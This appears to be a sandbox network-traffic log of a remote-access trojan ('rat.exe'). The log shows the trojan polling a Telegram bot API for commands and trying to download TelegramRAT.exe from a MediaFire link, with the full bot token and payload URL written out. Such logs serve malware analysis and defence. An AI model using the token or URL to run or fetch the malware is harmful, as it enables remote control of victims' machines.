Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:26 GMT
Content-Type: application/json
Content-Length: 375
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:31 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:37 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

www.mediafire.com

rat.exe

Remote address:

8.8.8.8:53

Request

www.mediafire.com

IN A

Response

www.mediafire.com

IN A

104.17.150.117

www.mediafire.com

IN A

104.17.151.117
GET

https://www.mediafire.com/file/8f08iikhf17syhu/TelegramRAT.exe/file

rat.exe

Remote address:

104.17.150.117:443

Request

GET /file/8f08iikhf17syhu/TelegramRAT.exe/file HTTP/1.1
Host: www.mediafire.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sun, 12 Jan 2025 11:18:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7976
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: MCI5mAbOrAESVVVEWY+TYQDXHJFSl1cmBfw6rumMwfmDLfX/auc8oTjiYBbkPkSaltIPXs28358S4Sr2y5LkM5LbNN46WMefIkEHNhc6q/SegBBe+z0BbHj+Hz1zUqHb5u1a5V/QwXquzfM7sdomug==$h5OkPAzp9HjpIpEm7/OBZg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: __cf_bm=xcpw8k4yjVpl1p.Zfmn5ACEIq6NPDltRAXjmjopt0f4-1736680713-1.0.1.1-zDGuMuNb8dAjRIMfKNTgbVco7lU0J8nCPsazzUBVsZHvqGE.LbXH.uUnUJ02uG.ani4cGNbPzGfTLF6lMZkYrw; path=/; expires=Sun, 12-Jan-25 11:48:33 GMT; domain=.mediafire.com; HttpOnly; Secure
Server: cloudflare
CF-RAY: 900cbf1bbc9d9502-LHR
alt-svc: h3=":443"; ma=86400
DNS

117.150.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

117.150.17.104.in-addr.arpa

IN PTR

Response
DNS

211.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.143.182.52.in-addr.arpa

IN PTR

Response
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CPiSywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGKTKjrwGIjASY0reHbChnZ8b3wbMiYVNhHjLQSR3CyOsHLWoxxYpTTdMCDzFbmK4SdIfImrMLfAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGKTKjrwGIjASY0reHbChnZ8b3wbMiYVNhHjLQSR3CyOsHLWoxxYpTTdMCDzFbmK4SdIfImrMLfAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
x-client-data: CPiSywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGKTKjrwGIjBc2JoKtgkKs-xX2e46nUBGZDqj1vhYZfm9iFvYgcd4qxg8Wqjmw2CJCpGPL_4nh48yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGKTKjrwGIjBc2JoKtgkKs-xX2e46nUBGZDqj1vhYZfm9iFvYgcd4qxg8Wqjmw2CJCpGPL_4nh48yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

234.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f10�I
DNS

content-autofill.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

